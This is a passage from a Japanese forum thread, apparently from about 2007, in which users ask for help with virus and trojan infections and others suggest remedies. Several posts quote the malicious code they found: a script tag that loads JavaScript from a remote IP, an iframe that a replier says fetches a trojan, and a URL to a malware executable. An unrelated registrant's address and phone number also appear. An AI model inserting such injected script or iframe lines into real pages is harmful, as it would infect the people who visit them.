【ルータの有無】　「有り」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「ファイル名: C:\WINDOWS\DOWNLO~1\jwdtabar.dll
ウイルス/スパイウェア名: ADW_CNSADD.Z (クリックで詳細情報を表示)
」


クリックしても詳細が表示されず、ググッても一件しかヒットせずしかも英語のただのテキストみたいでした
感染する前はIEでネットしたくらいです。
しかも　　ファイルからウイルスが見つかりました。リアルタイム検索が有効なため、このファイルへのアクセスを拒否します。このウイルスは、手動で処理する必要があります

ってでたけどC:\WINDOWS\DOWNLOっていうフォルダが存在しないんでどうしようもありません
だれかどういう操作をしたら消せるのか教えてくだされ

>>694
jwdtabar.dllでググレ

ウィルスセキュリティ０でウィルスが発見されたけど、
駆除できません。
駆除する方法を知っている方、教えてくれるとありがたいです
[ウィルスファイル]
C:\windows\system32\gebyyaa.dll

かなり初歩的な質問です。よくP2Pをやって個人画像流出っていう事件あるけど、当の本人達はウイルス対策がずさんだからこのような結果を招いたって事?
それとも対策はしてても防げなかったって事?

隣に橋が架かっていても
飛び越えてみる奴もいる
橋を見ないで泳ぐ奴も
やった本人に聞かないと
実際のところは判らない

>>697
>>13

ウイルスチェキが分かりません？＞＜
サイト？ソフト？教えてください

日本語でおｋ

>>701
Oops!!!!!!
thank you ,your response.
but I have just solved my problem. XD

ﾜﾗｼﾖﾒﾅｲｱﾙﾈ

すいませんパソコン初心者です。
パソコンの電源が切れなくなったと思ったら画面が骸骨1つになってしまい動かなくなってしまいました。これはやっぱりウイルスですか？

>>704
釣りでもいいや…
>これはやっぱりウイルスですか？
そうで〜す。
P2P関係のウイルスはダウソで
つhttp://tmp6.2ch.net/download/subback.html

何をやったらそうなったぐらい書けよ
どうせ違法行為だから書けないんだろうけど

ふ〜ん
ドクロまだ放流されてんだな。

>>705
釣りじゃないです。ダウンですか…頑張って調べてみます。ありがとうございました。

>>706
すいません書き忘れてました。Cabosを使ってるのですがそれが原因でしょうか…

>>708
明らかにP2Pを介した感染は、セキュ板ではスルー。
ダウソ板いくか、とっととリカバリする。

ちなみにそのウイルスは初心者程度じゃ一切手に負えない。
ご愁傷様

色々調べた結果私には無理そうなのでリカバリすることにしました。スレ違いなのに皆さんありがとうございました！！

【使用OS】　「WinXP SP2」
【Microsoft Update（MU）の状態】　「最新」
【使用セキュリティソフトとバージョン】　「なし」
【スパイウェア対策ソフト】　「Spybot 1.4」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「してない＆さっきした」
【ルータの有無】　「あり」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
D:\4DB79B1C.exe は　Infostealer.Gampass に感染しています。
D:\openjane_bu\Logs\2ch\ネットゲーム\ネトゲ実況2\1096907580.dat は　VBS.Internal に感染しています。
C:\WINDOWS\system32\a.exe は　Infostealer.Gampass に感染しています。
C:\WINDOWS\Help\4DB79B1C.chm は　Infostealer.Gampass に感染しています。
C:\Program Files\Common Files\Microsoft Shared\MSInfo\4DB79B1C.dat は　Infostealer.Gampass に感染しています。
C:\Program Files\Common Files\Microsoft Shared\MSInfo\4DB79B1C.dll は　W32.Condown.A に感染しています。
（シマンテック社のオンラインウィルススキャンによる）

【どんな症状が出るか】　「PCが重い。フォルダオプションで「ファイルを全て表示」にしても、表示されない。
セーフモードで起動しようとしても、強制再起動される。ウィルス対策のサイトを開くと、IEが強制終了されることがある（再現性あり）」
【症状が出る前に何をやったか】　「使用者にどんなファイルをDLしたか、怪しいURLを踏んだかなどを聞いたが、曖昧な答え」
【症状を解決しようとどのような処置を取ったか】　「隠しファイル表示を試行。セーフモードを試行。スパイボットでチェック。グーグル検索」

感染したPCは家族兼用で、私の自作機のお下がりです。そのため、セキュリティソフトは入れてませんでした。
ttp://housecall.antivirus.com/housecall/start_jp.aspが終了してから、定期的な検索はしていなかったようです。
CとDの両方に感染しているため、ファイルを退避してのリカバリーもためらわれます。
隠しファイル表示不能やセーフモード不可は初めての症状なので、どうしていいかわからず困っています。
有効な対処法があれば、ご教授ください。

へ
　　___ 　　　　　　　 　 　 　 　 　　　　　　　　　　　　ﾑ　　i
　「 ﾋ_i〉　　　 　 　　　　　　 　 　　　　　　　　　　　　 ゝ　〈
　ﾄ　ノ 　　　　　　　　　　　　　　　　　　　　　　　　　　iニ(()
　i 　{ 　 　　　　　　　 　　　＿＿＿_ 　 　　　　　　　　| 　ヽ
　i　　i　　　 　　　　　　　／__,　 , ‐-＼ 　 　 　 　 　　i 　　}
　|　　 i　　　　　　 　　／（●) 　 ( ● )＼　　　　　　 {､　 λ
　ト−┤.　　　　　　／ 　 　（__人__） 　　　＼　　　 ,ノ　￣ ,!
　i　　　ゝ､_ 　　　　|　　　　　´￣` 　 　　　　|　,. '´ﾊ　　　,!
.　ヽ、 　　　｀`　､,__＼ 　　 　 　　　　　 　 ／"　＼ 　ヽ／
　　　＼ノ　ﾉ　　　ﾊ￣r/:::r―--―/::７　　 ﾉ　　　　／
　 　　 　 ヽ.　　　　　　ヽ::〈； . '::. :' |::/　　 /　　　,. "
　　　　　　　 `ｰ ､　　　　＼ヽ::. ;::：|/　　　　　ｒ'"
　　　　　／￣二二二二二二二二二二二二二二二二ヽ
　　　　　| 答 |　　　　　クリーンインストール　　　　　│|
　　　　　＼＿二二二二二二二二二二二二二二二二ノ

質問なのにage忘れていました。申し訳ない。
本日は出かける用があるので、対策ソフトを買ってこようと思います。

補足：確認した、IEが落ちるサイトは以下のとおりです。
ttp://www.avast.com/
ttp://ringonoki.net/tool/antiv/review/r-avg.html
ttp://www.clamwin.com/
ttp://ringonoki.net/tool/antiv/review/r-clamwin.html
ttp://www.avgjapan.com/content/view/41/49/
ttp://www.bitdefender.com/

>>712
ありがとうございます。やはりそれが一番確実なのでしょうか。

>>711
つ ttp://www.nifty.com/security/vcheck/

>>714
チェックしてみましたが、該当のウィルスは検出されませんでした。
やはり、クリーンインストールして市販のアンチウィルスソフトを入れることにします。

答えてくださった方々、ありがとうございました。

Domain Information: [ドメイン情報]
[Domain Name] BIO-T.JP

[登録者名] バイオテクニカ
[Registrant] Biotechnica

[Name Server] dns01.hs.kddi.ne.jp
[Name Server] dns02.hs.kddi.ne.jp

[登録年月日] 2003/07/01
[有効期限] 2008/07/31
[状態] Active
[最終更新] 2007/08/01 01:05:05 (JST)

Contact Information: [公開連絡窓口]
[名前] 富田 泰史
[Name] Tomita,Yasushi
[Email] [email protected]
[郵便番号] 150-0000
[住所] 東京都渋谷区渋谷1丁目13-8
[Postal Address] 1-13-8,Shibuya,Shibuya-ku,Tokyo,150-0000,Japan
[電話番号] 03-6418-0304

【使用OS】XP2 home edition
【うｐの状態】最新
【使用セキュリティソフト】ウィルスバスター１４
【スパイウェア対策】無し
ルータ：無し
すいません、どうやら例の〜〜〜imgのウィルスに感染してしまったようです。
1756かどうかは忘れてしまったのですが、起動してしまいました。Cドライブ直下に
十字架のようなアイコンが生成されてます。
そして勝手にネットにつなぎ（繋いでる状態でも再度繋ぐ）メッセを起動し、ファイルを送信しようとしています。
なんとか完全消去する手段は無いでしょうか・・色々試しているのですが・・

はい、おめでとう。
クリーンインストールですね。

まじスカ＞＜

すみません。PC初心者です
Yahoo!ﾂｰﾙﾊﾞｰを最新にアップデートしますか？が毎回出てきてたので、インストールしたらそれが原因か定かではなぃのですが、中国系のサイトが現れました。ウィルスが入った為か重くて重くて困っています(T_T)

またクリーンインストールとはなんでしょうか？初心者質問で申し訳ありませんm(__)mよろしくお願いします･･

オンラインウイルススキャンしろ

それはどぅゆう事ですか？(>_<)本当に初心者ですみませんm(__)m

無償オンラインスキャン|ウィルスチェック Part.2
http://pc11.2ch.net/test/read.cgi/sec/1177784260/

>>720
これをやればある程度は自動でウイルスとかを駆除してくれるので初心者むき
実行する前に自分のアンチウイルスソフトは切っとけ
ttp://www.pandasoftware.com/activescan/activescan/ascan_2.asp

>>720 >>722
ここはセキュリティ初心者質問スレじゃないし、
PC初心者は http://pc11.2ch.net/pcqa/

【使用OS】　「windows2000 XP」
【Microsoft Update（MU）の状態】　「」　
【使用セキュリティソフトとバージョン】　「avast! 4.7」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「イエス」　
【スパイウェア対策ソフト】　「×」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「」
【ルータの有無】　「なし」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「ttp://www.famitsu.com/anime/news/2007/06/14/681,1181819986,73434,0,0.htmlを踏んだ時に、
棒人間が工事を行っているようなアニメーション（？）が表示された」

【どんな症状が出るか】　「特に今のところないが、若干反応が遅くなった気がする」
【症状が出る前に何をやったか】　「」
【症状を解決しようとどのような処置を取ったか】　「」
【その他の質問】　「もしウイルスだったときにとくに対処があれば教えてほしいです。」

【ネット】キングソフト、２ちゃんねる検索と提携…セキュリティソフトを２ちゃんねる検索ページから無償配布 [07/08/29]
http://news21.2ch.net/test/read.cgi/bizplus/1188390903/

>>726
右から左に黒い人間が走り去って行き、「BLADESTORM」「傭兵募集中」というアニメーションなら見た。

>>728
そうそう！それです！
ウイルスじゃないですよね？

ふっふっふ・・・

へっへっへ・・・

ほっほっほ・・・

はっはっは・・・

ひっひっひ・・・

にゃっにゃっにゃっ・・・

ねちょっねちょっねちょっ・・・

なんだよ、おまえら・・・

くちゃっくちゃっくちゃっ・・・

ほじっほじっほじっ・・・

ったく馬鹿しかいねえのかよ！




ぺちょっぺちょっぺちょっ・・・

やれやれ・・・・










あん、あん、あんっ

夏も終わりだというのに・・・









してっしてっしてっ・・・

まったく・・・







いくっいくっいくっ・・・

ここ感染してますね

　　○
((　(ヽヽ
　　 >_|￣|○

age厨の流出知ってる？

これ、ノートンが反応したんだけど、何ですかね？
ガレッジがいるんですけど
ぐぐっても出てこない

ttp://up.uppple.com/src/up3411.jpg

>>746
アラートオープンが6箇所
ループタグが2箇所
mailtoストームが100箇所
FDDアタックが24箇所
無限ループが2箇所
ニュースストームが6箇所
Telnetストームが114箇所

・・・・これは危険ｗ

>>747
踏んだ時にノートンがこのコンピューターは安全ですって出て
ブラウザのスレイプニルの設定でダウンロードできませんて
出たから大丈夫なのかな・・・？

>>748
ﾉｰﾄﾝさんが止めたんだろ
一応ｽｷｬﾝを勧める

？？？
？

>>747
そういうのってどうやって調べてるの？
ノートンで直踏みしたワケじゃなさそうだけど。

>>751
ブラクラチェッカー　でググってみると幸せになれる

俺はいつも直踏み。

俺も普通に直踏みする。
たとえワンクリックサイトでも余裕でしょ。
怖いのはグロ画像だけだよ実際。
ウイルスやスパイウェアなんて、まともなAV入れてりゃすぐ削除できるし。

PC立ち上げると、最近自動的に中国？のYahoo!みたいなサイトが開きます(T_T)
http://adc.scopeng.com/mirror/adid/10019061.html
これはウィルスなのでしょうか？PCもすごく重くなってしまい困っています･･
どなたか対処方教えてください(>_<)

質問用テンプレ

サイトhttp://adc.scopeng.com/の調査結果サイト概要
入力されたURLは存在しませんでした。

scopeng.com に一致するページは見つかりませんでした。

検索のヒント:
キーワードに誤字・脱字がないか確認します。
別のキーワードを試してみます。
もっと一般的なキーワードに変えてみます。

すみません(>_<)間違えました！
http://ads.scopeng.com/mirror/adid/10019061.htmlでした(T_T)
もう一度鑑定お願いしますm(__)m

同様

初めまして
【使用OS】：Windows XP SP2」
【Microsoft Update（MU）の状態】：最新
【使用セキュリティソフトとバージョン】Iinternet security 2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】：更新済
【スパイウェア対策ソフト】：無し
【スパイウェア対策ソフトの更新は定期的に行なっているか】無し
【ルータの有無】：有り

【スキャンの結果何が検出されたか】：無し
【どんな症状が出るか】：IE６、FireFoxでWebサイトを見ようとすると、「sdo.90908080.comへの接続が必要です」
「ユーザー名」「パスワード」のログイン画面がでる。キャンセルを押してもしつこく何度も出てくる。
【症状が出る前に何をやったか】　：自覚症状なしorz
【症状を解決しようとどのような処置を取ったか】：上記のアドレスをググってみたのですが、中国語のサイトしかヒット
しませんでした。断片的に「消毒」とか見えるのでウィルスかなと、、、
【その他の質問】：キャッシュファイル等を削除して、解決したかと思ったらまた再発。
　さらにはどのサイトを見ても、ndnd.comのインラインフレームが左上に小さく埋め込まれて表示されいる。
　<iframe src="http://www.ndnd.info/cai/guanggao.htm" width="20" height="20" frameborder="0"></iframe> ent-Style-Type" content="text/css">
　テキストエンコーディングが文字列で表示されていることも。
　ヤバイんでしょうか？(´Д⊂ｸﾞｽﾝ

やばいね。

とりあえずiframeで呼び出してるサイトは
トロイ呼んでるので有害確定
Update済なら不発に終わるはずなんだけど

sdo.90908080.comに定期的に接続する何らかのウイルスに
感染していると見るのが妥当かなぁ

>>762
おおお、神様ありがとうございます。
やはり感染していましたか、、、(´･ω･`)ｼｮﾎﾞｰﾝ
一時は外部への接続が一切できなくなるほどネットワークが
激重になっていたのですが、
17時過ぎて別フロアの社員が帰り始めたとたん、
プッツリと症状が出なくなりましたよ。

会社(で使用している自分)のPCがおかしくなったって事？

始めまして
すれ違いかもしれませんが書き込ませていただきます

さっきいろいろ動画をあさっていたら、いきなり小さなウインドウで
注意、コンピューターが冒される危険があります
と出て、閉じたら
リンクが変わって、あなたのパソコンがウイルスにコントロールされます
保護しますか？と出ました

これは、はいとすると、ウイルスに感染してしまうやつですよね？
一応NOD32というウイルスバスターに入っているのですが感知は何もしてません

少し不安になったのでどなたか意見お願いします

ちなみに履歴を探してもそのようなページは見つかりません

>一応NOD32というウイルスバスターに入っているのですが

釣りは他所でやってくれ。

>>766
大丈夫という事でしょうか
なんかすみませんでした

っつーか
> 注意、コンピューターが冒される危険があります
こういうのってそれ自体が出すんじゃないのかな。。。

>>754
でもまあ、時々最新Exploitとか貼ってあったりするんだな。

Spybotも入れてないやつがまだいるんだ。

あげ

あげまん

【使用OS】　「xpsp2」
【Microsoft Update（MU）の状態】　「最新」　
【使用セキュリティソフトとバージョン】　「マカフィーインターネットセキュリティ2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」　
【スパイウェア対策ソフト】　「なし」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「なし」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「クッキーのほかはなし」

【どんな症状が出るか】　「BIOS起動画面から画面全体にちらつくドットが出る。アイコンは消えていく。
【症状が出る前に何をやったか】　「海外サイトでダウンロードしたexe??」
【症状を解決しようとどのような処置を取ったか】　「ローレベルフォーマット処理。WINインストCD入れると復活」
【その他の質問】　「どこにいるのかわからない。ネットの接続ははずしたので他からは入らないはずだけどHDD以外にも
感染するんだろうか?フォーマットしても消えてないのかな・・・まったく分かりません」

>773
BIOS起動画面って最初に出てくるメーカーのロゴ？
それともBIOSのセットアップメニューの画面のこと？
アイコンというのは、デスクトップ上にあるアイコンやC:\内にあるアイコンのこと？

＞WINインストCDを入れると復活
と言うのはそのウイルスが復活するってこと？

早っ・・・レスありがとうございます。
AMIBIOSのメーカーの画面です。XPなしで起動すると普通なんですが。
アイコンは、そうです。

OSインストール中にだんだん画面があやしくなって
インストール完了するころには元通りの見ずらい画面です。

>775
つまりローレベル（物理）フォーマット後は症状なし
XPをインストールすると症状発生…か

…駄目元で回復コンソールを使って
ブートセクタとマスターブートレコードの修復を行なってみたら？

すみません、やってみます。
修復インストールは時間がたつとやっぱり戻ってしまうのですが。

>777
じゃあ、まず回復コンソールにログオンできるかやってみて。

Windows 回復コンソールの起動方法
Windows 回復コンソールを起動するには、以下のいずれかの方法を使用します。 ? Windows のセットアップ フロッピー ディスクまたは Windows の CD-ROM を使用してコンピュータを起動します。[セットアップの開始] 画面で、F10 キーを押すか、R キー (修復) を押します。

Windows 回復コンソールの使用方法
Windows 回復コンソールを起動すると、次のメッセージが表示されます。
Microsoft Windows XP(TM) 回復コンソール。

回復コンソールはシステムの修復と回復機能を提供します。
EXIT と入力すると、回復コンソールを終了し、コンピュータを再起動します。

1: C:\WINDOWS

どの Windows インストールにログオンしますか?
(取り消すには Enter キーを押してください)
該当する Windows インストールの番号を入力した後、Administrator アカウントのパスワードを入力するように求められます。

注 : 誤ったパスワードを 3 回入力すると、Windows 回復コンソールが終了します。
また、セキュリティ アカウント マネージャ (SAM) データベースが存在しないか破損している場合も、
認証が正しく行われないため、Windows 回復コンソールを使用できません。
パスワードを入力して Windows 回復コンソールが起動した後、
『コンピュータを再起動するには exit と入力します。 』

ログオンが成功すれば以下の表示になる

C:\WINDOWS>

回復コンソールへは入れたんですが、変な画面のままなので
模様越しに文字を読む感じです。
FIXMBRをYしましたが、活動はフリーズしたものの再起動したら
やはり効果なしでした。
ハードディスク交換してみようかと考えてます。

>779
回復コンソールも駄目となると…
もうそれしか手が無いのかもしれないな。

海外サイトでダウンロードしたexeを実行するぐらいだから覚悟はあったんだろ

描画が崩れるってのはVGAかVRAMか逝ってるんじゃね？

VGAのファン止まってるとか。

>782
回復コンソールってWindowsそのものを起動させないんだから
VGAは読み込まれない筈だと思うよ。

TROJ_SHEURAFの情報探してます。
教えてくださいｌ

【使用OS】　「2000」
【Microsoft Update（MU）の状態】　「週に1回ぐらい」　
【使用セキュリティソフトとバージョン】　「ウィルスバスター」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新です」　
【スパイウェア対策ソフト】　「ウィルスバスター」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「行っています」
【ルータの有無】　「ルータは、なしです」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「TROJ_SHEURAF」

【どんな症状が出るか】　「ダイヤルアップ接続が切断されたりします」
【症状が出る前に何をやったか】　「わかりません」
【症状を解決しようとどのような処置を取ったか】　「ウィルス情報を探しても、見つかりません」
【その他の質問】　「一応、パソコンを光回線の場所に持ってきてますが、
　TROJ_SHEURAFというウィルス情報が何処にも無くて、お手上げです」

>>785
TROJ_SHEURAFなんて無い。
対処法は"Trend customers"を読め。
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ%5FSHEUR%2EAF&VSect=Sn

すいません教えてください、5分おきに警告音と共に
　WINDOWS　security　Alert！の英語の警告が出てきます、
ちなみにYESを押すと日本語が怪しいサイトが出て、スパイウェア
に侵されて、ダウンロードしますかみたいな事が書いてありました。
その時は、プログラムの設定等にもアクセス制限になり、SPY　BOT
で駆除したのですが、再度立ち上げるとやはり同じ状態に戻ってしまいます
、前から使用していたNortn360でチェックした時にTroijan.kilavを
検出しましたっていう事がありました、初心者なのでどうしたら良いか
想像が付きません、対処法はありますか？
ません

>>787
http://pc11.2ch.net/test/read.cgi/sec/1162464139/

〉〉788　行ってみたけど分かりません、どの辺り見れば
良いですか？

行くだけじゃなくて全部読みなされ

＞＞790　もしかしたらがあったんで、やってみます！
　アンカーはちゃんと出たかな？

>>787
とおりすがりだけど･･･
インチキソフトについてはspybotは検出率はいいんだけど
これで駆除すると中途半端になることが往々にあるみたいで
駆除目的では使わない方が返っていいらすい。
以前ならRogue removerがこの手のインチキソフトには
一番よかったみたいだが現在は使えない状態みたいなので
SUPERAntiを一度試して味噌
ttp://ratan.dyndns.info/supaiwea/su-pa-anntiINS.html
2chスレ　http://pc11.2ch.net/test/read.cgi/sec/1181739523/

完ッ璧にオワタ…
ＰＣがネット接続できなくなった…（；谷）

ウイルススキャンヌもアップデートできんし
ネットが繋がらんから対策もわからんぬ…

助けて下さい！

「Infostealer.Gampass」
に感染してしまいました＞＜

感染しているファイルが
「tj9viewer.dll」というファイルなんですけど
ウイルススキャンヌでもセーフモードでも削除できません＞＜

ブラウザを開く度ウイルススキャンヌが反応しこのウイルスが検出されネットに接続できません

どなたか対処法を教えて頂けないでしょうか？
真剣にお願いいたします…

（；谷）

＞「tj9viewer.dll」

C:￥windows￥system32￥
に巣食ってるみたい
手動で削除できんか？
それができたなら後、残りのファイルや改竄されたレジストリとかを
アンチソフトや駆除機能のあるオンラインで駆除・削除

ってこれってノートンでもバスターでも駆除できるだろ
何のアンチソフト使ってるか知らんが

アンチソフトとかわけわからん言葉を使うな

細かいとこ突っ込むな

>>786
そこは、みたんだけど、
対処法がでてないんですけど

アンチソフト の検索結果 約 3,630 件中 1 - 10 件目 (0.24 秒

ウィルスソフトって言われるよりは、アンチソフトって言われたほうが
なんかいやなもん突っ込まれる気がしないだけましだけどな。

とあるPCショップにて店員に「ウィルスソフトは必須ですよぉ」って
しきりに奨められたときは、今はウィルスを自分で入れるのが流行なのかって
マジに悩んでしまったこともあるしな。

>>800
>今はウィルスを自分で入れるのが流行なのかって
>マジに悩んでしまったこともあるしな。

ネタとして最悪につまらんわ
本気だとしたら頭の回転が悪すぎる
そんな低脳はいないと信じたいのでやっぱり単につまらん

>>801
うん、面白くないと思う。
でも、そうやって、きちんと説明すべきところを
客に甘えて省いている店員がいるのも事実。
そして、とんでもないところでクレームをつけられる、と。

後、店員に対しての、皮肉とか嫌味とか言うのを読み解けないお前も、
充分つまんない人間だって事だ。

店員に言えよ

ここは子供しかいないようだな。

加齢臭漂うおっさん乙

>>803
救いがたい低脳だな。
そんなつまらない話はお前の頭の中に封印しとけ。
読まされる俺たちは全員脱力なんだよ。

>>783
VGAドライバとVGAカードは別だぞ。

物理的な故障はOS関係なし。

>>807
脱糞よりましじゃねえか。

>>793
長屋ﾋﾟｰｰｰね

長屋ふれあい広場
http://ex14.vip2ch.com/test/read.cgi/part4vip/1186499159/

877辺り

マルチ

>808
そうなん！？

物理的な故障だと、確実に有償修理だろうな。

あの…質問なんですが(>_<)
ﾕｰﾁｭｰﾌﾞで、柳原可奈子さんの動画を見ようとしたら、20秒
くらいの柳原さんの動画集って音声だけの動画が出てきて、
「右に表示されているURL」をクリックしてください、って出て、そこをクリックしたんですけど
ウィルスだったらどうしようと思ってすぐ消したんですが
恐いです…(;_;)
同じようにお笑い芸人さんの動画集といって別のサイトに
誘導してるみたいで…。
ケータイからなので読みにくいし、URLも貼れなくてすみません(ﾉω･､)　

動画はﾕｰﾁｭｰﾌﾞで「柳原可奈子」って調べたらすぐ出ます(>_<)

ここは鑑定スレではありません。
http://pc11.2ch.net/hack/ で。

【使用OS】　Windows XP Professional
【Microsoft Update（MU）の状態】　機能まで最新　ただし現在は実行できない
【使用セキュリティソフトとバージョン】　Symantec Antivirus 10
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　最新　
【スパイウェア対策ソフト】　特に入れていなかった
【スパイウェア対策ソフトの更新は定期的に行なっているか】　特にしていなかった
【ルータの有無】　あり
【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
なし
【どんな症状が出るか】　多くのサイトに繋がらない、もしくは表示が出来ない。
また、場合によっては勝手にwww.31joy.com/s368/GO368.gif
に飛ばされることがある。おかしいと思って調べたところ、どうもソースの先頭に
<script src=http://67.19.116.187/1.js></script
と言う文字列が追加されているようだ。
このスクリプトが実行されて、飛ばされて居るっぽいorz

【症状が出る前に何をやったか】　仕事の関係で中国から来たwordファイルを開いた。
それには画像もファイルも含まれていたのでそれが感染していたのかも...

【症状を解決しようとどのような処置を取ったか】　
表示しようとするページの約半数がちゃんと表示されないのでつらいところですが、
googleで調べたところ中国語のページのみが引っかかります。
どうもGO368.gifがやばいようなのですが、対策法は解りませんでした。

【その他の質問】

このパソコンが感染したと思って他のパソコンでも試したのですが
同様の症状になりました。同じルータにぶら下がっているので一瞬で感染したのでしょうかorz
あるいは、ルーターより上流にあるサーバー(?)が感染しているのでしょうか。
ちなみにプロクシサーバーは使わない設定にしています。

長くてすいませんが宜しくお願いします。

>817
中華系トロイ感染によりリカバリを強く奨める！

>818

やはりそうですかorz

ただ、システムを入れ直すとなると結構大変なので
(直近のバックアップを取っていないのが悪いのですが)
もう少し悪あがきしてみます。

HTMLが改変されているのを見ると、
どこかにトロイ系のプロクシサーバーがインストールされている
可能性が強いと思うのですが、これを調べる方法はある
のでしょうか。route print, ipconfigあたりを見る限り
異常はないのですが...

>819
中華系トロイはマジ厄介だよ。
何度やっても復活してくるし、あのアダ被の住人ですら手を妬くほど。
理由はセーフモードで読み込まれるサービスが常駐しているから。

さあ、俺はそこまではちと…

>>819
HTMLが改変っていうのはどういう意味なんですか？

>819
本来のHTMLソースの前に
<script src=http://67.19.116.187/1.js></script
という１行が挿入されるんです。

こちらはその後、67.19.116.187を制限付きサイトにしてしたり
www.31joy.comをhostsファイルで0.0.0.0へリダイレクトしたり
外部のプロクシサーバーを使ってみたりとかいろいろやっているうちに
なぜか症状（上記の行の挿入)が収まりました。
でも、時限トロイで単に休止しているだけかもしれないのでしばらく注意しておきます。

あと、これまでググッテても中華サイトしか引っかかりませんでしたが、どうやら英語圏でも
被害が出始めたようです。駆除コードをつくってくれないかな...

ttp://www.techsupportforum.com/security-center/hijackthis-log-help/180164-gmail-redirection-virus-site.html

これってトロイなのか？
それとも久々のスクリプトウイルスなのか？

ローカル串として動作するエージェントの類じゃね?
げんなりするようなスクリプトで途中で投げたけど
たとえば www1.31joy.com/S368/S368.exe が実行される。
中華トロイ。クッキーもいろいろ仕込んでるので全消し推奨。

OSはMe。譲り受けた自作機を使っています。

W32.Rajump系ワーム、RavMonE.exeにやられました。
シマンテック配布の駆除ツールFxRajump.exeで本体は駆除し
レジストリをのRavMonE.exeで検索して関連項目全て削除したつもりですが
USB外付けHDDを接続するたびにレジストリにシェル拡張が作られ
右クリックメニューに”Auto”コマンド（RavＭｏｎE.exe起動コマンドライン）が出来、
当然、ドライブをダブルクリックしても
「関連付けるアプリケーションの設定エラー
このプログラムは、種類が 'ファイル' のファイルを実行するために必要です。
RavMonE.exe の場所 :」
となって、エクスプローラで開けません。
レジストリを見るとHKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Explorer\MountPoints\L\_Autorun
というのが、消しても作られてしまうようです。
外付けドライブを以前のように扱うにはどうしたらよいかお知恵をお貸しください。。。

>>764
>>817
>>818
私の部署は全員MacOSX、他の部署はセキュリティ対策済みのXPだったのですが
その後の調査で一部のバカが私物のノートPCをノーガードで
持ち込んでいる事が判明。しかも中国とWord添付ファイルでやり取り。
ウチの会社(・ー・)ｵﾜｯﾀﾅ･･･
MacOSXでサイトを見ても激重か接続不可、もしくはソースの先頭にあやしい文字列です。
かと思えば全く問題なく接続できたり、、、
社内のどこかに危険なプロクシサーバーが出来てしまったという事ですかね、、、

>>826
この手のツールは手近なサーバ(IIS、SQL、etc.)の脆弱性を狙って
拡散することも多いので、管理者はサーバもチェックしたほうがいいぞ。

>>826
その「一部のバカ」に損害請求をしてから、懲戒解雇にすべし。

>826
>760さんの会社も治っていなかったのですね。
>763の書き込みがあったので解決したかと思っていました。
私の所も今は収まっていますが、いつ再発するかｶﾞｸｶﾞｸﾌﾟﾙﾌﾟﾙです。

>824
スクリプト解析ありがとうございます。
とりあえず、キャッシュ・クッキー等はすべて消しました。
ただ、>826と同じように同じネットワーク下の他のpcでも似た症状がでたことから
>827さんのおっしゃるように上流サーバーの可能性もありそうだと思い、
今のところローカルPCの全消去は思いとどまっています。
(Hijackthisでもローカルに怪しいエントリは発見できなかったので)

その仕込まれたサーバってのにDHCPも含まれていて、それっぽいIPアドレスを名乗ってたら影響が出てもおかしくない気もする。
でもそんなことあるのかなとも・・・・
影響を受けた一部のPCって、近いハブから取ってるPCだけだったりした？

>829
＞(Hijackthisでもローカルに怪しいエントリは発見できなかったので)
HijackThisのStartupListの解析はやってみた？

773辺りの者ですが、グラボ取替えで直りました。

・・・症状が、サイケな色彩の市松模様にアルファベットがランダムにはいった
グラフィックが画面の上下にでてきて点滅する、アイコンが消えていく、などだったので
ウィルスを疑ったのですが・・・グラボのこんな壊れ方をみたのは初めてです。
お世話になった皆様、ありがとうございました。

ドイツで販売されたWindows Vista搭載PCに
1994年のフロッピーウイルスが感染していたことが分かり
メーカーが対応に追われている
ウイルス感染が見つかったのは、ディスカウントストアで販売された
MedionのノートPC「MD96290」
問題のウイルス「Stoned.Angelina」は、フロッピーディスクのブートセクターに感染する
特に悪質な機能は持っていない
Windows Vistaがプリインストールされた現代のノートPCに
なぜこんな昔のウイルスが感染したのかは謎
HDDにこのウイルスを感染させるためには、感染したフロッピーからブートする必要があるが
Vistaのインストールでこれはあり得ないと